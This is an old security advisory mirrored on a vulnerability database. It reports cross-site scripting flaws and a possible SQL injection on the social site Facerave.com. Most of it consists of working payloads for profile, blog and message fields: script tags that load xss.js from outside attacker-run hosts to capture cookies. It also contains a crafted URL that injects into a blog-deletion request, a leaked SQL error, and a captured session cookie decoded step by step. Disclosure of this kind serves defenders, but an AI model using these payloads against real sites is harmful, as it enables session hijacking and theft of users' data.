Lucene search
+L

facerave.txt

🗓️ 21 Jun 2006 00:00:00Reported by LunyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Security vulnerabilities on Facerave.com including XSS and possible SQL injection, leading to cookie disclosure and potential data manipulation

Code
`Facerave.com  
  
Homepage:  
http://www.facerave.com  
  
Effected files:  
  
* Profile input boxes  
  
- Self Description box  
  
* Posting a blog entry  
  
* Sending a message  
  
index.php  
------------------------------------------------------  
  
XSS vuln with cookie disclosure via posting a comment:  
  
No filter evasion needed. for PoC in yourself description box put:  
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  
  
Screenshots:  
http://www.youfucktard.com/xsp/facerave1.jpg  
http://www.youfucktard.com/xsp/facerave2.jpg  
  
-----------------------------------------------------  
  
XSS vuln with cookie disclosure when posting a blog entry:  
  
Same as above:  
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>  
  
Screenshots:  
http://www.youfucktard.com/xsp/facerave3.jpg  
http://www.youfucktard.com/xsp/facerave4.jpg  
  
Our cookie:  
  
This is remote text via xss.js located at youfucktard.com lang=en; PHPSESSID=dfb7edf9c3d2350d04cd5ed60585b2f1;voted=YToxMTp7aTowO047aToxO3M6NDoiMzkzNiI7aToyO3M6NDoiNzQ1NCI7aTozO3M6NjoiMTE4OTY1IjtpOjQ7czo2OiIxMTg5NjYiO2k6NTtzOjY6IjExODk2NyI7aTo2O3M6NjoiMTE4OTY4IjtpOjc7czo2OiIxMTg5NjkiO2k6ODtzOjY6IjExODk3MCI7aTo5O3M6NjoiMTE4OTcxIjtpOjEwO3M6NjoiMTE4OTcyIjt9; last_pr=7454  
  
  
Breaking down the cookie:  
  
PHPSESSID= (Our php session Id on the site)  
  
voted= Base64 encoded. When we decode it we get:  
  
a:11:{i:0;N;i:1;s:4:"3936";i:2;s:4:"7454";i:3;s:6:"118965";i:4;s:6  
  
  
----------------------------------------------------  
  
XSS Vuln and possible SQL injection on deleting blog id:  
  
http://www.facerave.com/index.php?req=blog&act=del&id=1087">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>  
  
Query error msg:  
You have an error in your SQL syntax near '\' AND b_user=7454' at line 1  
Failed query: DELETE FROM rate_blogs WHERE b_id=1087\' AND b_user=7454  
  
Screenshot:  
http://www.youfucktard.com/xsp/facerave5.jpg  
  
-----------------------------------------------------  
  
Sending a message xss vuln:  
  
Same as above, no filter evasion. in your msg title or subject put:  
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>  
  
Screenshot:  
http://www.youfucktard.com/xsp/facerave6.jpg  
------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4
20